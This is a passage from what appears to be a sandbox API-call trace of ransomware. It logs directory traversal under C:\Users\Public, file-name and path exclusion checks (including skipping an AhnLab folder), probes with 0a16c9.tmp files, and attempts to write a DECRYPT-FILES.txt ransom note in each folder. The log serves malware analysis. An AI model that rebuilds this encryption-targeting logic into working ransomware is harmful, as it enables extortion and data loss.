lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="autorun.inf") returned 1 [0186.724] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="boot.ini") returned 1 [0186.724] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="desktop.ini") returned 1 [0186.724] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="ntuser.dat") returned -1 [0186.724] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="iconcache.db") returned -1 [0186.724] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="bootsect.bak") returned 1 [0186.724] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="ntuser.dat.log") returned -1 [0186.724] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="thumbs.db") returned -1 [0186.724] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Bootfont.bin") returned 1 [0186.724] lstrlenW (lpString="Google Chrome.lnk") returned 17 [0186.724] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.724] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a09a40, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 1 [0186.725] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.725] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="autorun.inf") returned 1 [0186.725] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="boot.ini") returned 1 [0186.725] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="desktop.ini") returned 1 [0186.725] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="ntuser.dat") returned -1 [0186.725] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="iconcache.db") returned 1 [0186.725] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="bootsect.bak") returned 1 [0186.725] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="ntuser.dat.log") returned -1 [0186.725] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="thumbs.db") returned -1 [0186.725] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="Bootfont.bin") returned 1 [0186.725] lstrlenW (lpString="Mozilla Firefox.lnk") returned 19 [0186.725] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.725] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a09a40, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 0 [0186.725] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.725] CloseHandle (hObject=0xffffffff) returned 0 [0186.725] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.725] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.725] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.725] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.725] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.725] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0186.725] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0186.725] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0186.725] lstrcatW (in: lpString1="Documents", lpString2="\\" | out: lpString1="Documents\\") returned="Documents\\" [0186.725] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Documents\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\" [0186.725] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\", lpSrch="\\Program Files") returned 0x0 [0186.725] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\", lpSrch=":\\Windows") returned 0x0 [0186.725] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\", lpSrch="\\Games\\") returned 0x0 [0186.725] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.725] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.725] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.725] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.725] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.726] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\", lpSrch="\\All Users") returned 0x0 [0186.726] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.726] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.726] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.726] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\", lpSrch="AhnLab") returned 0x0 [0186.726] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.726] lstrlenW (lpString="C:\\Users\\Public\\Documents\\") returned 26 [0186.726] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.726] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Documents\\\\0a16c9.tmp") returned 37 [0186.726] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\\\0a16c9.tmp" (normalized: "c:\\users\\public\\documents\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0186.727] lstrlenW (lpString="C:\\Users\\Public\\Documents\\") returned 26 [0186.727] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.727] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Documents\\\\DECRYPT-FILES.txt") returned 44 [0186.727] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\documents\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.727] lstrlenW (lpString="C:\\Users\\Public\\Documents\\") returned 26 [0186.727] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Documents\\*") returned="C:\\Users\\Public\\Documents\\*" [0186.727] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf201d920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf201d920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.727] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.727] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf201d920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf201d920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.727] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.727] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.727] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf201d920, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf201d920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf201d920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0186.727] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0186.727] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0186.727] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0186.727] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0186.727] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0186.727] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0186.727] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0186.727] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0186.727] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0186.728] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0186.728] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.728] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0186.728] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0186.728] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0186.728] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0186.728] lstrlenW (lpString="C:\\Users\\Public\\Documents\\") returned 26 [0186.728] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.728] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\Public\\Documents\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\" [0186.728] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\Public\\Documents\\0a16c9.tmp") returned="C:\\Users\\Public\\Documents\\0a16c9.tmp" [0186.728] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.728] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\0a16c9.tmp" (normalized: "c:\\users\\public\\documents\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.728] CloseHandle (hObject=0x0) returned 0 [0186.728] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.728] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0f76580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.728] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.728] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.728] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.728] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.729] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.729] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.729] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0186.729] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0186.729] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0186.729] lstrcatW (in: lpString1="My Music", lpString2="\\" | out: lpString1="My Music\\") returned="My Music\\" [0186.729] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="My Music\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\") returned="C:\\Users\\Public\\Documents\\My Music\\" [0186.729] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Music\\", lpSrch="\\Program Files") returned 0x0 [0186.729] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Music\\", lpSrch=":\\Windows") returned 0x0 [0186.729] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Music\\", lpSrch="\\Games\\") returned 0x0 [0186.729] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Music\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.729] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Music\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.729] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Music\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.729] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Music\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.729] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Music\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.729] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Music\\", lpSrch="\\All Users") returned 0x0 [0186.729] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Music\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.729] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Music\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.729] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Music\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.729] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Music\\", lpSrch="AhnLab") returned 0x0 [0186.729] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Music\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.729] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music\\") returned 35 [0186.729] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.729] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Documents\\My Music\\\\0a16c9.tmp") returned 46 [0186.729] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Music\\\\0a16c9.tmp" (normalized: "c:\\users\\public\\documents\\my music\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0186.731] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music\\") returned 35 [0186.731] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.731] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Documents\\My Music\\\\DECRYPT-FILES.txt") returned 53 [0186.731] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Music\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\documents\\my music\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.732] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music\\") returned 35 [0186.732] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Music\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\*") returned="C:\\Users\\Public\\Documents\\My Music\\*" [0186.732] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x11, ftLastAccessTime.dwHighDateTime=0x2, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0186.732] CloseHandle (hObject=0x25c) returned 1 [0186.732] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0186.732] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0186.732] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0186.732] lstrcatW (in: lpString1="My Pictures", lpString2="\\" | out: lpString1="My Pictures\\") returned="My Pictures\\" [0186.732] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="My Pictures\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\") returned="C:\\Users\\Public\\Documents\\My Pictures\\" [0186.732] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Pictures\\", lpSrch="\\Program Files") returned 0x0 [0186.732] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Pictures\\", lpSrch=":\\Windows") returned 0x0 [0186.732] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Pictures\\", lpSrch="\\Games\\") returned 0x0 [0186.732] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Pictures\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.732] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Pictures\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.732] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Pictures\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.733] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Pictures\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.733] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Pictures\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.733] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Pictures\\", lpSrch="\\All Users") returned 0x0 [0186.733] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Pictures\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.733] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Pictures\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.733] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Pictures\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.733] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Pictures\\", lpSrch="AhnLab") returned 0x0 [0186.733] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Pictures\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.733] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\") returned 38 [0186.733] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.733] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Documents\\My Pictures\\\\0a16c9.tmp") returned 49 [0186.733] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\\\0a16c9.tmp" (normalized: "c:\\users\\public\\documents\\my pictures\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0186.737] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\") returned 38 [0186.737] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.737] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Documents\\My Pictures\\\\DECRYPT-FILES.txt") returned 56 [0186.737] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\documents\\my pictures\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.737] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\") returned 38 [0186.737] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\*") returned="C:\\Users\\Public\\Documents\\My Pictures\\*" [0186.737] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x11, ftLastAccessTime.dwHighDateTime=0x2, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0186.737] CloseHandle (hObject=0x25c) returned 1 [0186.737] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0186.737] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0186.737] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0186.737] lstrcatW (in: lpString1="My Videos", lpString2="\\" | out: lpString1="My Videos\\") returned="My Videos\\" [0186.737] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="My Videos\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\") returned="C:\\Users\\Public\\Documents\\My Videos\\" [0186.738] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Videos\\", lpSrch="\\Program Files") returned 0x0 [0186.738] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Videos\\", lpSrch=":\\Windows") returned 0x0 [0186.738] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Videos\\", lpSrch="\\Games\\") returned 0x0 [0186.738] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Videos\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.738] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Videos\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.738] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Videos\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.738] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Videos\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.738] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Videos\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.738] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Videos\\", lpSrch="\\All Users") returned 0x0 [0186.738] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Videos\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.738] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Videos\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.738] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Videos\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.738] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Videos\\", lpSrch="AhnLab") returned 0x0 [0186.738] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Videos\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.738] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Videos\\") returned 36 [0186.738] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.738] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Documents\\My Videos\\\\0a16c9.tmp") returned 47 [0186.738] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Videos\\\\0a16c9.tmp" (normalized: "c:\\users\\public\\documents\\my videos\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0186.740] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Videos\\") returned 36 [0186.740] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.740] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: 